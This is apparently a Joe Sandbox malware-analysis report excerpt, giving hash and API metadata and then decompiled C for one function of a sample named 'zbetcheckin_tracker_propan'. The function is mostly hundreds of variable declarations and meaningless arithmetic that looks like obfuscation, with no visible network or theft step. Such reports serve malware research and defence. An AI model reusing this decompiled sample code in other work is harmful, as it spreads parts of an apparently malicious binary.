      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressProc$Value$ExceptionFilterHandleModulePointerProcessUnhandled$CurrentDebuggerDecodeEncodeLibraryLoadPresentTerminate
      • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
      • API String ID: 2799798708-1046234306
      • Opcode ID: c3e8bde50756f9785b97914fa3b24a16ee4822c05a20e0c150603f0ff55fcea9
      • Instruction ID: 51af8bd7a9e657bb6f171ff335d3bd463ec0a5f6adc2d72fd75aa79d704417c7
      • Opcode Fuzzy Hash: c3e8bde50756f9785b97914fa3b24a16ee4822c05a20e0c150603f0ff55fcea9
      • Instruction Fuzzy Hash: B8419672900219BBCB10BFB5AD869EF7B68AB05744F10843FF914E2291DB7D85948B5C
      C-Code - Quality: 99%
      			E00404A60() {
      				signed int _v5;
      				signed int _v6;
      				signed int _v7;
      				signed int _v12;
      				intOrPtr _v16;
      				signed int _v20;
      				signed int _v24;
      				signed int _v25;
      				signed char _v26;
      				signed int _v32;
      				intOrPtr _v36;
      				intOrPtr _v40;
      				signed int _v41;
      				signed int _v48;
      				signed int _v52;
      				signed int _v56;
      				intOrPtr _v60;
      				intOrPtr _v64;
      				signed int _v68;
      				intOrPtr _v76;
      				signed int _v80;
      				signed short _v84;
      				signed int _v88;
      				signed int _v92;
      				intOrPtr _v96;
      				char _v98;
      				signed int _v104;
      				intOrPtr _v108;
      				signed int _v109;
      				signed int _v116;
      				short _v120;
      				signed int _v124;
      				short _v128;
      				signed int _v132;
      				signed int _v133;
      				signed int _v140;
      				signed int _v144;
      				signed int _v145;
      				signed int _v156;
      				intOrPtr _v160;
      				signed int _v164;
      				signed int _v165;
      				signed int _v166;
      				short _v172;
      				signed int _v176;
      				signed int _v180;
      				signed int _v181;
      				signed int _v188;
      				signed int _v192;
      				signed int _v193;
      				signed int _v200;
      				signed int _v204;
      				signed int _v208;
      				signed int _v212;
      				signed int _v216;
      				char _v217;
      				signed short _v224;
      				signed int _v228;
      				signed int _v236;
      				signed int _v237;
      				signed int _v244;
      				intOrPtr _v252;
      				signed int _v260;
      				signed int _v264;
      				signed int _v268;
      				intOrPtr _v272;
      				signed char _v273;
      				signed int _v280;
      				signed int _v284;
      				signed int _v288;
      				signed int _v292;
      				intOrPtr _v300;
      				signed int _v301;
      				intOrPtr _v308;
      				intOrPtr _v312;
      				signed int _v316;
      				intOrPtr _v320;
      				intOrPtr _v324;
      				long long _v332;
      				long long _v340;
      				long long _v348;
      				long long _v356;
      				long long _v364;
      				long long _v372;
      				long long _v380;
      				long long _v388;
      				long long _v396;
      				long long _v404;
      				long long _v412;
      				long long _v420;
      				long long _v428;
      				long long _v436;
      				long long _v444;
      				long long _v452;
      				long long _v460;
      				long long _v468;
      				long long _v476;
      				long long _v484;
      				long long _v492;
      				long long _v500;
      				long long _v508;
      				long long _v516;
      				long long _v524;
      				long long _v532;
      				long long _v540;
      				long long _v548;
      				long long _v556;
      				long long _v564;
      				long long _v572;
      				long long _v580;
      				long long _v588;
      				long long _v596;
      				long long _v604;
      				long long _v612;
      				long long _v620;
      				long long _v628;
      				long long _v636;
      				long long _v644;
      				long long _v652;
      				long long _v660;
      				long long _v668;
      				long long _v676;
      				long long _v684;
      				long long _v692;
      				long long _v700;
      				long long _v708;
      				long long _v716;
      				long long _v724;
      				long long _v732;
      				long long _v740;
      				long long _v748;
      				long long _v756;
      				long long _v764;
      				long long _v772;
      				long long _v780;
      				long long _v788;
      				long long _v796;
      				long long _v804;
      				long long _v812;
      				long long _v820;
      				long long _v828;
      				long long _v836;
      				long long _v844;
      				long long _v852;
      				long long _v860;
      				long long _v868;
      				long long _v876;
      				long long _v884;
      				long long _v892;
      				long long _v900;
      				long long _v908;
      				long long _v916;
      				long long _v924;
      				long long _v932;
      				long long _v940;
      				long long _v948;
      				long long _v956;
      				long long _v964;
      				long long _v972;
      				long long _v980;
      				long long _v988;
      				long long _v996;
      				long long _v1004;
      				long long _v1012;
      				long long _v1020;
      				long long _v1028;
      				long long _v1036;
      				long long _v1044;
      				long long _v1052;
      				long long _v1060;
      				long long _v1068;
      				long long _v1076;
      				long long _v1084;
      				long long _v1092;
      				long long _v1100;
      				long long _v1108;
      				long long _v1116;
      				long long _v1124;
      				long long _v1132;
      				long long _v1140;
      				long long _v1148;
      				long long _v1156;
      				long long _v1164;
      				long long _v1172;
      				long long _v1180;
      				long long _v1188;
      				long long _v1196;
      				long long _v1204;
      				long long _v1212;
      				long long _v1220;
      				long long _v1228;
      				long long _v1236;
      				long long _v1244;
      				long long _v1252;
      				long long _v1260;
      				long long _v1268;
      				long long _v1276;
      				long long _v1284;
      				long long _v1292;
      				long long _v1300;
      				long long _v1308;
      				long long _v1316;
      				long long _v1324;
      				long long _v1332;
      				long long _v1340;
      				long long _v1348;
      				long long _v1356;
      				long long _v1364;
      				long long _v1372;
      				long long _v1380;
      				long long _v1388;
      				long long _v1396;
      				long long _v1404;
      				long long _v1412;
      				long long _v1420;
      				long long _v1428;
      				long long _v1436;
      				long long _v1444;
      				long long _v1452;
      				long long _v1460;
      				long long _v1468;
      				long long _v1476;
      				long long _v1484;
      				long long _v1492;
      				long long _v1500;
      				long long _v1508;
      				long long _v1516;
      				long long _v1524;
      				long long _v1532;
      				long long _v1540;
      				long long _v1548;
      				long long _v1556;
      				long long _v1564;
      				long long _v1572;
      				long long _v1580;
      				long long _v1588;
      				long long _v1596;
      				long long _v1604;
      				long long _v1612;
      				long long _v1620;
      				long long _v1628;
      				long long _v1636;
      				long long _v1644;
      				long long _v1652;
      				long long _v1660;
      				long long _v1668;
      				long long _v1676;
      				long long _v1684;
      				long long _v1692;
      				long long _v1700;
      				long long _v1708;
      				long long _v1716;
      				long long _v1724;
      				long long _v1732;
      				long long _v1740;
      				long long _v1748;
      				long long _v1756;
      				long long _v1764;
      				long long _v1772;
      				long long _v1780;
      				long long _v1788;
      				long long _v1796;
      				long long _v1804;
      				long long _v1812;
      				long long _v1820;
      				long long _v1828;
      				long long _v1836;
      				long long _v1844;
      				long long _v1852;
      				long long _v1860;
      				long long _v1868;
      				long long _v1876;
      				long long _v1884;
      				long long _v1892;
      				long long _v1900;
      				long long _v1908;
      				long long _v1916;
      				long long _v1924;
      				long long _v1932;
      				long long _v1940;
      				long long _v1948;
      				long long _v1956;
      				long long _v1964;
      				long long _v1972;
      				long long _v1980;
      				long long _v1988;
      				long long _v1996;
      				long long _v2004;
      				long long _v2012;
      				long long _v2020;
      				long long _v2028;
      				long long _v2036;
      				long long _v2044;
      				long long _v2052;
      				long long _v2060;
      				long long _v2068;
      				long long _v2076;
      				long long _v2084;
      				long long _v2092;
      				long long _v2100;
      				long long _v2108;
      				long long _v2116;
      				long long _v2124;
      				long long _v2132;
      				long long _v2140;
      				long long _v2148;
      				long long _v2156;
      				long long _v2164;
      				long long _v2172;
      				long long _v2180;
      				long long _v2188;
      				long long _v2196;
      				long long _v2204;
      				long long _v2212;
      				long long _v2220;
      				long long _v2228;
      				long long _v2236;
      				long long _v2244;
      				long long _v2252;
      				long long _v2260;
      				long long _v2268;
      				long long _v2276;
      				long long _v2284;
      				long long _v2292;
      				long long _v2300;
      				long long _v2308;
      				long long _v2316;
      				long long _v2324;
      				long long _v2332;
      				long long _v2340;
      				long long _v2348;
      				long long _v2356;
      				long long _v2364;
      				long long _v2372;
      				long long _v2380;
      				long long _v2388;
      				long long _v2396;
      				long long _v2404;
      				long long _v2412;
      				long long _v2420;
      				long long _v2428;
      				long long _v2436;
      				long long _v2444;
      				long long _v2452;
      				long long _v2460;
      				long long _v2468;
      				long long _v2476;
      				long long _v2484;
      				long long _v2492;
      				long long _v2500;
      				long long _v2508;
      				long long _v2516;
      				long long _v2524;
      				long long _v2532;
      				long long _v2540;
      				long long _v2548;
      				long long _v2556;
      				long long _v2564;
      				long long _v2572;
      				long long _v2580;
      				long long _v2588;
      				long long _v2596;
      				long long _v2604;
      				long long _v2612;
      				long long _v2620;
      				long long _v2628;
      				long long _v2636;
      				long long _v2644;
      				long long _v2652;
      				long long _v2660;
      				long long _v2668;
      				long long _v2676;
      				long long _v2684;
      				long long _v2692;
      				long long _v2700;
      				long long _v2708;
      				long long _v2716;
      				long long _v2724;
      				long long _v2732;
      				long long _v2740;
      				long long _v2748;
      				long long _v2756;
      				long long _v2764;
      				long long _v2772;
      				long long _v2780;
      				long long _v2788;
      				long long _v2796;
      				long long _v2804;
      				long long _v2812;
      				long long _v2820;
      				long long _v2828;
      				long long _v2836;
      				long long _v2844;
      				long long _v2852;
      				long long _v2860;
      				long long _v2868;
      				long long _v2876;
      				long long _v2884;
      				long long _v2892;
      				long long _v2900;
      				long long _v2908;
      				long long _v2916;
      				long long _v2924;
      				long long _v2932;
      				long long _v2940;
      				long long _v2948;
      				long long _v2956;
      				long long _v2964;
      				long long _v2972;
      				long long _v2980;
      				long long _v2988;
      				long long _v2996;
      				long long _v3004;
      				long long _v3012;
      				long long _v3020;
      				long long _v3028;
      				long long _v3036;
      				long long _v3044;
      				long long _v3052;
      				long long _v3060;
      				long long _v3068;
      				long long _v3076;
      				long long _v3084;
      				long long _v3092;
      				long long _v3100;
      				long long _v3108;
      				long long _v3116;
      				long long _v3124;
      				long long _v3132;
      				long long _v3140;
      				long long _v3148;
      				long long _v3156;
      				long long _v3164;
      				long long _v3172;
      				long long _v3180;
      				long long _v3188;
      				long long _v3196;
      				long long _v3204;
      				long long _v3212;
      				long long _v3220;
      				long long _v3228;
      				long long _v3236;
      				long long _v3244;
      				long long _v3252;
      				long long _v3260;
      				long long _v3268;
      				long long _v3276;
      				long long _v3284;
      				long long _v3292;
      				long long _v3300;
      				long long _v3308;
      				long long _v3316;
      				long long _v3324;
      				long long _v3332;
      				long long _v3340;
      				long long _v3348;
      				long long _v3356;
      				long long _v3364;
      				long long _v3372;
      				long long _v3380;
      				long long _v3388;
      				long long _v3396;
      				long long _v3404;
      				long long _v3412;
      				long long _v3420;
      				long long _v3428;
      				long long _v3436;
      				long long _v3444;
      				long long _v3452;
      				long long _v3460;
      				long long _v3468;
      				long long _v3476;
      				long long _v3484;
      				long long _v3492;
      				long long _v3500;
      				long long _v3508;
      				long long _v3516;
      				long long _v3524;
      				long long _v3532;
      				long long _v3540;
      				long long _v3548;
      				long long _v3556;
      				long long _v3564;
      				long long _v3572;
      				long long _v3580;
      				long long _v3588;
      				long long _v3596;
      				long long _v3604;
      				long long _v3612;
      				long long _v3620;
      				long long _v3628;
      				long long _v3636;
      				long long _v3644;
      				long long _v3652;
      				long long _v3660;
      				long long _v3668;
      				long long _v3676;
      				long long _v3684;
      				long long _v3692;
      				long long _v3700;
      				long long _v3708;
      				long long _v3716;
      				long long _v3724;
      				long long _v3732;
      				long long _v3740;
      				long long _v3748;
      				long long _v3756;
      				long long _v3764;
      				long long _v3772;
      				long long _v3780;
      				long long _v3788;
      				long long _v3796;
      				long long _v3804;
      				long long _v3812;
      				long long _v3820;
      				long long _v3828;
      				long long _v3836;
      				long long _v3844;
      				long long _v3852;
      				long long _v3860;
      				long long _v3868;
      				long long _v3876;
      				long long _v3884;
      				long long _v3892;
      				long long _v3900;
      				long long _v3908;
      				long long _v3916;
      				long long _v3924;
      				long long _v3932;
      				long long _v3940;
      				long long _v3948;
      				long long _v3956;
      				long long _v3964;
      				long long _v3972;
      				long long _v3980;
      				long long _v3988;
      				long long _v3996;
      				long long _v4004;
      				long long _v4012;
      				long long _v4020;
      				long long _v4028;
      				long long _v4036;
      				long long _v4044;
      				long long _v4052;
      				long long _v4060;
      				long long _v4068;
      				long long _v4076;
      				long long _v4084;
      				long long _v4092;
      				long long _v4100;
      				long long _v4108;
      				long long _v4116;
      				long long _v4124;
      				long long _v4132;
      				long long _v4140;
      				long long _v4148;
      				long long _v4156;
      				long long _v4164;
      				long long _v4172;
      				long long _v4180;
      				long long _v4188;
      				long long _v4196;
      				long long _v4204;
      				long long _v4212;
      				long long _v4220;
      				long long _v4228;
      				long long _v4236;
      				long long _v4244;
      				long long _v4252;
      				long long _v4260;
      				long long _v4268;
      				long long _v4276;
      				long long _v4284;
      				long long _v4292;
      				long long _v4300;
      				long long _v4308;
      				long long _v4316;
      				long long _v4324;
      				long long _v4332;
      				long long _v4340;
      				long long _v4348;
      				long long _v4356;
      				long long _v4364;
      				long long _v4372;
      				long long _v4380;
      				long long _v4388;
      				long long _v4396;
      				long long _v4404;
      				long long _v4412;
      				long long _v4420;
      				long long _v4428;
      				long long _v4436;
      				long long _v4444;
      				long long _v4452;
      				long long _v4460;
      				long long _v4468;
      				long long _v4476;
      				long long _v4484;
      				long long _v4492;
      				long long _v4500;
      				long long _v4508;
      				long long _v4516;
      				long long _v4524;
      				long long _v4532;
      				long long _v4540;
      				long long _v4548;
      				long long _v4556;
      				long long _v4564;
      				long long _v4572;
      				long long _v4580;
      				long long _v4588;
      				long long _v4596;
      				long long _v4604;
      				long long _v4612;
      				long long _v4620;
      				long long _v4628;
      				long long _v4636;
      				long long _v4644;
      				long long _v4652;
      				long long _v4660;
      				long long _v4668;
      				long long _v4676;
      				long long _v4684;
      				long long _v4692;
      				long long _v4700;
      				long long _v4708;
      				long long _v4716;
      				long long _v4724;
      				long long _v4732;
      				long long _v4740;
      				long long _v4748;
      				long long _v4756;
      				long long _v4764;
      				long long _v4772;
      				long long _v4780;
      				long long _v4788;
      				long long _v4796;
      				long long _v4804;
      				long long _v4812;
      				long long _v4820;
      				long long _v4828;
      				long long _v4836;
      				long long _v4844;
      				long long _v4852;
      				long long _v4860;
      				long long _v4868;
      				long long _v4876;
      				long long _v4884;
      				long long _v4892;
      				long long _v4900;
      				long long _v4908;
      				long long _v4916;
      				long long _v4924;
      				long long _v4932;
      				long long _v4940;
      				long long _v4948;
      				long long _v4956;
      				long long _v4964;
      				long long _v4972;
      				long long _v4980;
      				long long _v4988;
      				long long _v4996;
      				long long _v5004;
      				long long _v5012;
      				long long _v5020;
      				long long _v5028;
      				long long _v5036;
      				long long _v5044;
      				long long _v5052;
      				long long _v5060;
      				long long _v5068;
      				long long _v5076;
      				long long _v5084;
      				long long _v5092;
      				long long _v5100;
      				long long _v5108;
      				long long _v5116;
      				long long _v5124;
      				long long _v5132;
      				long long _v5140;
      				long long _v5148;
      				long long _v5156;
      				long long _v5164;
      				long long _v5172;
      				long long _v5180;
      				long long _v5188;
      				long long _v5196;
      				long long _v5204;
      				long long _v5212;
      				long long _v5220;
      				long long _v5228;
      				long long _v5236;
      				long long _v5244;
      				long long _v5252;
      				long long _v5260;
      				long long _v5268;
      				long long _v5276;
      				long long _v5284;
      				long long _v5292;
      				long long _v5300;
      				long long _v5308;
      				long long _v5316;
      				long long _v5324;
      				long long _v5332;
      				long long _v5340;
      				long long _v5348;
      				long long _v5356;
      				long long _v5364;
      				long long _v5372;
      				long long _v5380;
      				long long _v5388;
      				long long _v5396;
      				long long _v5404;
      				long long _v5412;
      				long long _v5420;
      				long long _v5428;
      				long long _v5436;
      				long long _v5444;
      				long long _v5452;
      				long long _v5460;
      				long long _v5468;
      				long long _v5476;
      				long long _v5484;
      				long long _v5492;
      				long long _v5500;
      				long long _v5508;
      				long long _v5516;
      				long long _v5524;
      				long long _v5532;
      				long long _v5540;
      				long long _v5548;
      				long long _v5556;
      				long long _v5564;
      				long long _v5572;
      				long long _v5580;
      				long long _v5588;
      				long long _v5596;
      				long long _v5604;
      				long long _v5612;
      				long long _v5620;
      				long long _v5628;
      				long long _v5636;
      				long long _v5644;
      				long long _v5652;
      				long long _v5660;
      				long long _v5668;
      				long long _v5676;
      				long long _v5684;
      				long long _v5692;
      				long long _v5700;
      				long long _v5708;
      				long long _v5716;
      				long long _v5724;
      				long long _v5732;
      				long long _v5740;
      				long long _v5748;
      				long long _v5756;
      				long long _v5764;
      				long long _v5772;
      				long long _v5780;
      				long long _v5788;
      				long long _v5796;
      				long long _v5804;
      				long long _v5812;
      				long long _v5820;
      				long long _v5828;
      				long long _v5836;
      				long long _v5844;
      				long long _v5852;
      				long long _v5860;
      				long long _v5868;
      				long long _v5876;
      				long long _v5884;
      				long long _v5892;
      				long long _v5900;
      				long long _v5908;
      				long long _v5916;
      				long long _v5924;
      				long long _v5932;
      				long long _v5940;
      				long long _v5948;
      				long long _v5956;
      				long long _v5964;
      				long long _v5972;
      				long long _v5980;
      				long long _v5988;
      				long long _v5996;
      				long long _v6004;
      				long long _v6012;
      				long long _v6020;
      				long long _v6028;
      				long long _v6036;
      				long long _v6044;
      				long long _v6052;
      				long long _v6060;
      				long long _v6068;
      				long long _v6076;
      				long long _v6084;
      				long long _v6092;
      				long long _v6100;
      				long long _v6108;
      				long long _v6116;
      				long long _v6124;
      				long long _v6132;
      				long long _v6140;
      				long long _v6148;
      				long long _v6156;
      				long long _v6164;
      				long long _v6172;
      				long long _v6180;
      				long long _v6188;
      				long long _v6196;
      				long long _v6204;
      				long long _v6212;
      				long long _v6220;
      				long long _v6228;
      				long long _v6236;
      				long long _v6244;
      				long long _v6252;
      				long long _v6260;
      				long long _v6268;
      				long long _v6276;
      				long long _v6284;
      				long long _v6292;
      				long long _v6300;
      				long long _v6308;
      				long long _v6316;
      				long long _v6324;
      				long long _v6332;
      				long long _v6340;
      				long long _v6348;
      				long long _v6356;
      				long long _v6364;
      				long long _v6372;
      				long long _v6380;
      				long long _v6388;
      				long long _v6396;
      				long long _v6404;
      				long long _v6412;
      				long long _v6420;
      				long long _v6428;
      				long long _v6436;
      				long long _v6444;
      				long long _v6452;
      				long long _v6460;
      				long long _v6468;
      				long long _v6476;
      				long long _v6484;
      				long long _v6492;
      				long long _v6500;
      				long long _v6508;
      				long long _v6516;
      				long long _v6524;
      				long long _v6532;
      				long long _v6540;
      				long long _v6548;
      				long long _v6556;
      				long long _v6564;
      				long long _v6572;
      				long long _v6580;
      				long long _v6588;
      				long long _v6596;
      				long long _v6604;
      				long long _v6612;
      				long long _v6620;
      				long long _v6628;
      				long long _v6636;
      				long long _v6644;
      				long long _v6652;
      				long long _v6660;
      				long long _v6668;
      				long long _v6676;
      				long long _v6684;
      				long long _v6692;
      				long long _v6700;
      				long long _v6708;
      				long long _v6716;
      				long long _v6724;
      				long long _v6732;
      				long long _v6740;
      				long long _v6748;
      				long long _v6756;
      				long long _v6764;
      				long long _v6772;
      				long long _v6780;
      				long long _v6788;
      				long long _v6796;
      				long long _v6804;
      				long long _v6812;
      				long long _v6820;
      				long long _v6828;
      				long long _v6836;
      				long long _v6844;
      				long long _v6852;
      				long long _v6860;
      				long long _v6868;
      				long long _v6876;
      				long long _v6884;
      				long long _v6892;
      				long long _v6900;
      				long long _v6908;
      				long long _v6916;
      				long long _v6924;
      				long long _v6932;
      				long long _v6940;
      				long long _v6948;
      				long long _v6956;
      				long long _v6964;
      				long long _v6972;
      				long long _v6980;
      				long long _v6988;
      				long long _v6996;
      				long long _v7004;
      				long long _v7012;
      				long long _v7020;
      				long long _v7028;
      				long long _v7036;
      				long long _v7044;
      				long long _v7052;
      				long long _v7060;
      				long long _v7068;
      				long long _v7076;
      				long long _v7084;
      				long long _v7092;
      				long long _v7100;
      				long long _v7108;
      				long long _v7116;
      				long long _v7124;
      				long long _v7132;
      				long long _v7140;
      				long long _v7148;
      				long long _v7156;
      				long long _v7164;
      				long long _v7172;
      				long long _v7180;
      				long long _v7188;
      				long long _v7196;
      				long long _v7204;
      				long long _v7212;
      				long long _v7220;
      				long long _v7228;
      				long long _v7236;
      				long long _v7244;
      				long long _v7252;
      				long long _v7260;
      				long long _v7268;
      				long long _v7276;
      				long long _v7284;
      				long long _v7292;
      				long long _v7300;
      				long long _v7308;
      				long long _v7316;
      				long long _v7324;
      				long long _v7332;
      				long long _v7340;
      				long long _v7348;
      				long long _v7356;
      				long long _v7364;
      				long long _v7372;
      				long long _v7380;
      				long long _v7388;
      				long long _v7396;
      				long long _v7404;
      				long long _v7412;
      				long long _v7420;
      				long long _v7428;
      				long long _v7436;
      				long long _v7444;
      				long long _v7452;
      				long long _v7460;
      				long long _v7468;
      				long long _v7476;
      				long long _v7484;
      				long long _v7492;
      				long long _v7500;
      				long long _v7508;
      				long long _v7516;
      				long long _v7524;
      				long long _v7532;
      				long long _v7540;
      				long long _v7548;
      				long long _v7556;
      				long long _v7564;
      				long long _v7572;
      				long long _v7580;
      				long long _v7588;
      				long long _v7596;
      				long long _v7604;
      				long long _v7612;
      				long long _v7620;
      				long long _v7628;
      				long long _v7636;
      				long long _v7644;
      				long long _v7652;
      				long long _v7660;
      				long long _v7668;
      				long long _v7676;
      				long long _v7684;
      				long long _v7692;
      				long long _v7700;
      				long long _v7708;
      				long long _v7716;
      				long long _v7724;
      				long long _v7732;
      				long long _v7740;
      				long long _v7748;
      				long long _v7756;
      				long long _v7764;
      				long long _v7772;
      				long long _v7780;
      				long long _v7788;
      				long long _v7796;
      				long long _v7804;
      				long long _v7812;
      				long long _v7820;
      				long long _v7828;
      				long long _v7836;
      				long long _v7844;
      				long long _v7852;
      				long long _v7860;
      				long long _v7868;
      				long long _v7876;
      				long long _v7884;
      				long long _v7892;
      				long long _v7900;
      				long long _v7908;
      				long long _v7916;
      				long long _v7924;
      				long long _v7932;
      				long long _v7940;
      				long long _v7948;
      				long long _v7956;
      				long long _v7964;
      				long long _v7972;
      				long long _v7980;
      				long long _v7988;
      				long long _v7996;
      				long long _v8004;
      				long long _v8012;
      				long long _v8020;
      				long long _v8028;
      				long long _v8036;
      				long long _v8044;
      				long long _v8052;
      				long long _v8060;
      				long long _v8068;
      				long long _v8076;
      				long long _v8084;
      				long long _v8092;
      				long long _v8100;
      				long long _v8108;
      				long long _v8116;
      				long long _v8124;
      				long long _v8132;
      				long long _v8140;
      				long long _v8148;
      				long long _v8156;
      				long long _v8164;
      				long long _v8172;
      				long long _v8180;
      				long long _v8188;
      				long long _v8196;
      				long long _v8204;
      				long long _v8212;
      				long long _v8220;
      				long long _v8228;
      				long long _v8236;
      				long long _v8244;
      				long long _v8252;
      				long long _v8260;
      				long long _v8268;
      				long long _v8276;
      				long long _v8284;
      				signed int _v8288;
      				intOrPtr _t1541;
      				intOrPtr _t1560;
      				signed int _t1565;
      				intOrPtr _t1570;
      				intOrPtr _t1581;
      				signed int _t1630;
      				intOrPtr _t1653;
      				intOrPtr _t1666;
      				intOrPtr _t1668;
      				signed int _t1685;
      				intOrPtr _t1695;
      				signed int _t1712;
      				intOrPtr _t1731;
      				intOrPtr _t1751;
      				intOrPtr _t1763;
      				signed int _t1857;
      				intOrPtr _t1862;
      				intOrPtr _t1880;
      				intOrPtr _t1903;
      				intOrPtr _t1999;
      				signed int _t2019;
      				intOrPtr _t2022;
      				intOrPtr _t2037;
      				intOrPtr _t2044;
      				intOrPtr _t2050;
      				void* _t2072;
      				long long _t2402;
      				long long _t2478;
      				long long _t2483;
      				long long _t2579;
      				long long _t2700;
      				long long _t2765;
      				long long _t2802;
      				long long _t2860;
      
      				E0040C690(0x205c);
      				_v52 = 0x11;
      				_v132 = 0x1b;
      				_v172 = 1;
      				_v288 = 0xa;
      				_v6 = 0x1f;
      				_v193 = 0x11;
      				_v164 = 0x22;
      				_v192 = 0xe;
      				_v224 = 0x21;
      				_v124 = 0x20;
      				_v41 = 9;
      				_v104 = 0x11;
      				_t1541 =  *0x436058; // 0x39
      				_v228 = _t1541 + 0x00000049 |  *0x436044;
      				_v140 = _v200 - _v68;
      				_v128 = _v68 - _v292 + 0x5c - _v244;
      				_v164 = _v165 & 0x000000ff ^ _v144 ^ _v212 -  *0x42c00c;
      				_v26 = _v244 - _v144 + _v200 + _v204 - _v212;
      				_v237 = _v180 - 0x25 - _v204 - 0x4d;
      				_v236 = _v36 - (_v24 & 0x0000ffff) - _v140;
      				_v204 = _v109 & 0x000000ff ^ _v212;
      				_t1712 = _v204;
      				_t1903 =  *0x42c014; // 0x536cedcb
      				_t43 = _t1712 - 0x3f; // 0x536ced8c
      				_v181 = _t1903 + _t43;
      				_v280 = _v264 - _v200 & 0x0000003f;
      				_v6 = _v264 - (_v32 & 0x0000ffff) | 0x00000020;
      				_t2072 = _v140 -  *0x42d03c; // 0x0
      				if(_t2072 >= 0) {
      					_v133 = (_v181 & 0x000000ff) + 0x5f - (_v224 & 0x0000ffff) - _v212;
      					_t59 = _v36 - 0x8f; // -126
      					_v301 = (_v52 & 0x0000ffff) + _t59 ^ _v88;
      				}
      				_v166 = _v212 + 0x00000059 & _v268 - 0x00000042 & _v156;
      				_v98 = 0xf4;
      				_v133 = _v7 & 0x000000ff | 0x00000018 & _v204;
      				_v104 = _v104 & 0x0000ffff | (_v7 & 0x000000ff) - (_v181 & 0x000000ff);
      				_v26 = _v280 -  *0x42d03c - 0xe - _v316 + _v204;
      				_v252 = 0x907;
      				_t1560 =  *0x43604c; // 0x0
      				_v200 = _t1560 - _v268;
      				_v164 = _v180 + 0x4e - (_v164 & 0x0000ffff) - _v156;
      				_v26 = (_v25 & 0x000000ff) + 0x0000009c ^ _v36 + 0x0000005c;
      				_t1565 = _v5 & 0x000000ff;
      				_t1731 =  *0x42d034; // 0x0
      				_t91 = _t1565 + 0x11; // 0x11
      				_v181 = _v312 + 0x00000013 & _t1731 + _t91;
      				_v156 = (_v193 & 0x000000ff) - _v312;
      				_v80 = _v140 + (_v301 & 0x000000ff) - 0x32;
      				_v164 = _v264 + 0x00000059 | 0x000000c0;
      				_v273 = 0x35;
      				_v188 = _v156 + _v36 + 0x19;
      				_v52 = _v212 - (_v288 & 0x0000ffff) & _v144 & _v144;
      				_v7 = (_v104 & 0x0000ffff) + 0x5e;
      				_v180 = 0x31;
      				_t1570 =  *0x42d030; // 0x0
      				_v52 = _v268 + _t1570 - 0x00000052 | _v180;
      				_v36 = (_v164 & 0x0000ffff) + 0x13;
      				_v237 = _v316 + (_v52 & 0x0000ffff) + 0xa9;
      				_v280 = 0x13 - _v140 - (_v193 & 0x000000ff);
      				 *0x42c004 = (_v25 & 0x000000ff) + (_v301 & 0x000000ff);
      				_v188 = _v88 + 0x00000055 & _v20;
      				_v264 = E0040BFD0(_v140, _v88, _v204);
      				_v193 = _v212 & _v144 ^ (_v145 & 0x000000ff) + (_v24 & 0x0000ffff) & 0x00000017;
      				_v16 = 0xbf;
      				_t1581 =  *0x42c018; // 0x5f
      				_v236 = _t1581 - 0x00000061 | 0x00000043;
      				_v8288 = _v316;
      				if(_v8288 == 0) {
      					_t1751 =  *0x42c010; // 0x48
      					 *0x42c010 = _t1751 - (_v109 & 0x000000ff) + (_v6 & 0x000000ff);
      					if(_v200 != 0x21) {
      						_v52 = _v68 - 0x00000041 | _v200 + _v56;
      						_v176 = _v156 +  *0x42c00c | 0x00000045;
      					} else {
      						_v204 = _v268 - 0x52;
      						_t1695 =  *0x42d030; // 0x0
      						_v108 = _t1695 - _v144 - (_v288 & 0x0000ffff);
      					}
      					 *0x42c028 = (_v164 & 0x0000ffff) + 0x3d;
      				} else {
      					if(_v8288 == 1) {
      						if(_v192 < (_v181 & 0x000000ff)) {
      							_v264 = _v156 & 0x00000049;
      							_t1880 =  *0x436048; // 0x0
      							_v156 = _t1880 - _v308;
      						} else {
      							_v237 = _v204 + 0x00000008 - _v144 - _v212 & _v68;
      							_v7 = _v88 - _v212 - _v68 - 2;
      						}
      						_v193 = _v208;
      					} else {
      						if(_v8288 == 2) {
      							 *0x42c008 = _v6 & 0x000000ff;
      							_v166 = (_v166 & 0x000000ff) + (_v188 & 0x0000ffff) - 0x46 - _v244;
      						} else {
      							_v180 = 0x4e - _v244;
      						}
      					}
      				}
      				_v109 = (_v193 & 0x000000ff) + (_v52 & 0x0000ffff) - _v312 - _v180 + _v140;
      				_v96 = 0x42a248;
      				_v108 = _v140 + 0x61 - _v244;
      				_v132 = _v68 + 0x00000039 ^ 0x0000007c;
      				_v40 = 0x1dd;
      				_v212 = _v312 - _v200;
      				_t1763 =  *0x43604c; // 0x0
      				_t211 = (_v6 & 0x000000ff) - 0x47; // -71
      				_v164 = _t1763 - (_v5 & 0x000000ff) + _t211;
      				_v188 = (_v188 & 0x0000ffff) + (_v41 & 0x000000ff);
      				_v244 = _v156 | 0x0000000b;
      				_v212 = _v244 - _v244;
      				_v237 = _v12 +  *0x42c010 - _v264 + _v268 & 0x00000040;
      				_v272 = _v96;
      				_v301 = 0x5a - _v156 + _v76 - 0xb;
      				_v88 = _v165 & 0x000000ff | 0x00000017;
      				_v181 = (_v32 & 0x0000ffff) - (_v237 & 0x000000ff);
      				_v284 = (_v5 & 0x000000ff) + _v204 | 0x00000008;
      				_v237 = (_v132 & 0x0000ffff) + _v312 - _v264 - _v88 + _v264;
      				_v180 = E0040BBD0(_v204, _v88, _v212);
      				_v165 = _v264 - (_v7 & 0x000000ff) - _v180 + 0x00000014 ^ _v104 & 0x0000ffff;
      				_v60 = 0;
      				_v6 = _v76 - _v88 - _v140 + (_v260 & 0x0000ffff) + 8;
      				_v156 = 0x18;
      				_v26 = _v26 & 0x000000ff ^ (_v109 & 0x000000ff) + 0x0000000f - _v180 | _v140;
      				_v200 = _v244 - _v308;
      				_v5 = _v68 + _v140 + _v264 + _v144 + 0xa;
      				_v36 = 0x28 - (_v133 & 0x000000ff);
      				_v32 = _v144 + _v228 - _v312 + 0xf;
      				_v56 = _v88 + _v108;
      				_v124 = _v124 + (_v288 & 0x0000ffff) - 4;
      				_t297 = _v144 - 0x41; // -41
      				_v166 = (_v284 & 0x0000ffff) + 0x3f - _v156 + _t297;
      				_v6 = _v36 - _v244 & _v212 - _v56 - _v244;
